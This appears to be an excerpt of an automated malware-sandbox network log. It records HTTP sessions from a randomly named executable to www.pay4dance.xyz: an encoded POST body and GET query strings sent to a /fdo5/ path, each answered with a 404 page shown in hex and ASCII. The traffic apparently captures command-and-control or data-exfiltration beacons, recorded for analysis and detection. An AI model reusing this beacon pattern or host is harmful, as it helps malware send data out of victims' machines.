                                                                                              Host: www.pay4dance.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.pay4dance.xyz
                                                                                              Referer: http://www.pay4dance.xyz/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 30 52 31 52 49 42 66 57 6a 2f 35 52 53 5a 65 2f 2b 66 2b 69 2f 45 38 35 77 46 59 39 67 57 75 4e 39 76 34 45 4a 4b 5a 4e 43 38 31 6c 43 69 7a 79 47 53 79 79 76 6f 4b 33 65 37 71 65 6c 33 76 38 4b 4f 55 6b 33 70 52 50 59 76 61 36 4a 5a 50 30 78 39 55 71 74 7a 51 4d 63 4b 62 70 69 70 37 6d 74 2f 42 4a 61 66 71 39 71 59 42 58 71 39 4f 38 46 32 45 47 34 56 44 4f 50 53 53 70 6f 6a 76 48 73 50 5a 53 78 6b 45 46 34 6d 6e 48 6d 63 79 57 51 6d 4e 36 78 63 58 42 4e 50 71 37 51 65 37 33 77 36 4e 2f 79 43 4d 69 44 43 52 6e 31 4b 61 59 31 37 30 4a 47 2b 59 4b 58 33 70 30 63 76 71 74 69 54 32 35 65 63 68 4f 63 54 58 66 72 4c 38 43 62 45 37 55 62 55 2f 30 6b 55 4a 35 57 61 69 48 38 46 2b 72 43 6e 46 48 38 4c 4f 70 37 6a 4d 6f 6e 58 45 4b 6a 46 50 41 6e 34 31 50 76 71 4f 42 55 5a 48 62 4f 38 4c 44 32 76 42 6e 69 31 43 4f 6f 6b 41 66 56 2b 4a 68 39 48 77 48 4b 38 33 55 34 6b 79 43 32 55 68 61 73 4b 4f 55 71 55 6a 56 34 36 75 65 37 53 77 49 72 64 55 4a 39 36 64 49 47 30 76 38 53 38 52 69 4f 32 45 31 7a 6b 58 69 79 76 56 37 72 6c 67 41 46 63 6f 70 4d 62 67 58 68 6c 39 32 42 44 54 73 4c 36 6c 67 2b 4d 6f 74 4c 59 42 53 78 79 35 65 4e 54 47 53 70 76 71 77 31 69 42 55 55 70 6f 37 4f 36 53 70 56 34 55 48 7a 34 75 79 34 36 2f 78 75 53 52 4e 39 71 69 63 42 68 71 57 64 71 65 45 2f 43 53 39 41 4f 34 6e 67 41 47 68 36 47 67 66 64 50 37 72 67 4b 4c 38 4b 57 66 46 6e 41 42 7a 77 39 69 6a 71 57 2b 76 41 43 41 70 52 4c 66 7a 63 48 65 30 6d 6e 6e 6b 6d 63 35 76 46 39 47 69 54 47 41 39 72 5a 56 2b 4d 37 64 58 75 33 71 66 36 43 79 43 6d 42 70 77 30 53 6f 41 67 66 54 69 58 4b 53 64 35 4b 33 4d 51 31 78 4e 6f 77 36 5a 7a 6f 63 55 70 59 33 33 7a 78 7a 59 64 46 52 5a 57 2b 55 56 54 76 57 39 42 2f 67 65 78 48 78 71 51 4a 64 71 52 53 36 6d 57 44 71 66 47 38 75 74 44 54 7a 74 69 32 57 62 45 48 44 41 75 70 54 65 5a 31 34 42 66 6a 4a 78 5a 73 38 62 4d 63 7a 2b 69 64 57 66 6f 69 50 31 36 63 7a 67 4a 53 67 76 35 64 2f 6a 68 76 30 32 79 69 4a 55 4d 6b 62 48 62 6d 53 6f 70 4d 41 33 77 77 69 54 51 4e 56 4d 2f 5a 7a 67 50 35 6d 6a 63 66 69 34 48 33 59 74 43 4f 55 5a 6f 68 4e 6c 58 34 62 30 59 63 4d 47 4f 47 39 41 64 6b 67 4b 62 56 67 46 49 56 36 31 6f 77 63 53 54 33 72 6d 6d 71 41 2b 2f 32 58 6c 38 30 45 45 56 44 6c 72 45 50 4e 78 4a 37 39 49 6b 42 35 55 49 71 7a 35 49 54 48 36 68 47 33 67 51 4c 75 37 32 5a 53 2f 42 34 66 31 41 6e 65 4f 4d 61 68 45 6d 4a 33 48 6b 6c 6d 52 38 67 2f 55 71 33 77 51 39 74 59 77 71 41 4f 59 56 53 45 49 39 4b 71 74 44 56 53 55 4c 7a 32 70 4a 4e 5a 6c 31 6e 6b 75 31 4a 67 57 73 73 44 4c 58 73 73 59 45 30 79 79 6e 33 58 79 4c 37 78 55 32 51 6a 70 76 68 55 71 66 74 64 76 5a 76 6d 6a 69 30 6c 52 70 55 77 69 73 33 62 57 71 43 6c 56 58 6a 62 6c 41 43 4c 5a 78 52 38 78 32 4d 43 5a 68 6c 74 6a 2f 78 33 44 4d 41 35 69 72 37 72 4e 4f 78 44 73 50 68 43 56 68 52 61 44 78 4a 52 6e 6d 31 4b 33 35 42 6a 77 75 4b 2b 39 74 4a 72 38 65 49 5a 61 4b 63 4e 43 45 4e 79 4e 53 65 2f 68 4d 65 63 4d 4d 58 38 59 38 6c 79 58 57 74 7a 4b 56 4e 38 48 43 44 67 53 50 71 73 4f 6c 59 38 2b 7a 74 73 52 4b 65 75 4e 66 4d 45 78 75 34 71 30 39 73 6d 79 7a 30 51 4f 7a 7a 65 35 4c 6f 2b 49 55 46 66 61 65 6e 4b 65 36 63 70 4c 41 72 65 2f 6c 6b 6d 6b 69 45 6d 35 6e 31 74 75 75 53 57 39 44 63 4f 77 36 65 6d 6a 44 74 47 4b 78 77 4c 6e 78 6c 77 7a 4d 53 56 6b 42 49 56 45 76 66 44 44 6b 47 66 68 4f 31 4a 4b 51 43 7a 6e 53 6c 76 5a 62 50 54 43 6e 42 55 75 45 56 63 70 6d 66 35 44 6d 76 51 59 76 78 39 45 42 6e 51 79 62 6a 2b 2f 65 58 30 76 38 6c 63 32 50 2f 39 4d 2b 75 62 63 73 6a 32 58 41 4b 69 43 39 47 47 43 71 70 6b 56 72 75 36 78 64 7a 36 2f 78 49 74 78 67 6c 66 4e 66 52 72 59 49 6b 4c 55 58 33 4c 36 6c 31 67 53 6a 53 71 33 4a 43 6b 71 56 5a 39 7a 6b 59 4d 62 4c 42 44 78 4e 4b 44 42 6b 7a 4e 6c 48 68 4f 57 63 75 31 55 70 38 6f 4b 42 62 44 56 63 59 4f 45 79 50 37 6a 76 6a 66 6c 4e 2b 6c 46 46 44 74 65 4a 74 61 57 6e 69 36 63 32 51 6f 31 77 49 61 76 62 56 51 58 5a 74 51 49 36 53 44 76 7a 77 36 37 79 31 33 44 54 64 33 6b 61 55 39 78 52 65 46 69 66 38 5a 4a 4b 35 74 76 6b 31 68 6b 37 71 44 75 33 2f 55 48 2f 42 48 44 77 6e 70 53 39 4d 43 38 68 67 58 53 68 55 79 2f
                                                                                              Data Ascii: 540H2x=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
                                                                                              Dec 3, 2023 16:26:50.387907982 CET1340INHTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:26:50 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 5278
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                                              Dec 3, 2023 16:26:50.387933016 CET1340INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                                              Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                                              Dec 3, 2023 16:26:50.387953997 CET1340INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                                              Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                                              Dec 3, 2023 16:26:50.387972116 CET1340INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                                              Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                                              Dec 3, 2023 16:26:50.388072968 CET333INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                                              Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.44975266.29.155.54802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:26:52.795949936 CET460OUTGET /fdo5/?540H2x=5TdxL1jawfl3Ka3qvJ6r7WEnhl9d9FSMp+F3J8Z8WOIoZyaqSH32l6+4J8Kvi3fjVro4t5UeAoiyMZT16OgV/jIcRYbasIDnmQ==&fXUX=ShJ8DFcXvtj84pw HTTP/1.1
                                                                                              Host: www.pay4dance.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Dec 3, 2023 16:26:53.129287004 CET1340INHTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:26:52 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 5278
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 